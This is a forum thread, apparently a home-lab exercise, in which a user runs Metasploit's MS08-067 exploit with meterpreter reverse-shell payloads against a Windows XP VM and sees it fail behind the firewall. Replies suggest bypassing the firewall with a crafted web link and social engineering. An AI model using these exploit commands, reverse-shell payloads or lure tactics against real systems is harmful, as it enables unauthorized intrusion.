Jump to content

[microsoft exploit] ms08_067_netapi


pierre
 Share

Recommended Posts

Hello,

I am actually working on this exploit.
It works well when XP firewall is turn off.

Unfortunately, when I turn it on, exploit doesn't work anymore.

Topology :

Sans_titre.jpg

Procedure :

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3
RHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(ms08_067_netapi) > check [*] 192.168.0.3:445 - Cannot reliably check exploitability.
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 192.168.0.1:4444
[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.0.3:445). [*] Exploit completed, but no session was created.

Have you got any clue to bypass windows firewall ?!

Link to comment
Share on other sites

Try using the reverse_https payload instead of tcp. see if that works while the firewall is enabled. btw which ms xp version are you testing against?

I try both http and https payload, no results

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3

RHOST => 192.168.0.3

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_https

payload => windows/meterpreter/reverse_https

msf exploit(ms08_067_netapi) > set LHOST 192.168.0.1

LHOST => 192.168.0.1

msf exploit(ms08_067_netapi) > check

[*] 192.168.0.3:445 - Cannot reliably check exploitability.

msf exploit(ms08_067_netapi) > exploit

[*] Started HTTPS reverse handler on https://0.0.0.0:8443/

[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.0.3:445).

[*] Exploit completed, but no session was created.

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_http

payload => windows/meterpreter/reverse_http

msf exploit(ms08_067_netapi) > check

[*] 192.168.0.3:445 - Cannot reliably check exploitability.

msf exploit(ms08_067_netapi) > exploit

[*] Started HTTP reverse handler on http://0.0.0.0:8080/

[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.0.3:445).

[*] Exploit completed, but no session was created.

I try to exploit a Windows XP SP2

I think the fire wall blocks income port 445. Exploit fails.

Yes but because the destination port is 80 with http payload, I thought it wouldn't block anymore..

Link to comment
Share on other sites

root@osboxes:~# ping 192.168.0.3
PING 192.168.0.3 (192.168.0.3) 56(84) bytes of data.
^C
--- 192.168.0.3 ping statistics ---
3 packets transmitted, 0 received, 100% packet loss, time 2016ms


root@osboxes:~# nmap -p 445 192.168.0.3

Starting Nmap 7.01 ( https://nmap.org) at 2016-04-14 11:17 EDT
Nmap scan report for 192.168.0.3
Host is up (0.00048s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 08:00:27:A5:80:AD (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.32 seconds

Firewall is well-activated so port 445 is filtered, and doesn't respond to connection attemps, so metasploit fails, right ?

Link to comment
Share on other sites

Looks about right... this fire wall wont let connections in BUT outbound trafic is allowed, you can exploit this with a crafted web link.

You should look into client side attacks for port 445... metasploit will launch a webserver hosting exploit code, when the target machine clicks the link, you should see the magic happen. This also means your payload should be configured as a reverse_shell of some kind.

Link to comment
Share on other sites

Looks about right... this fire wall wont let connections in BUT outbound trafic is allowed, you can exploit this with a crafted web link.

You should look into client side attacks for port 445... metasploit will launch a webserver hosting exploit code, when the target machine clicks the link, you should see the magic happen. This also means your payload should be configured as a reverse_shell of some kind.

Hmm so previously client has to be social-engineering

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...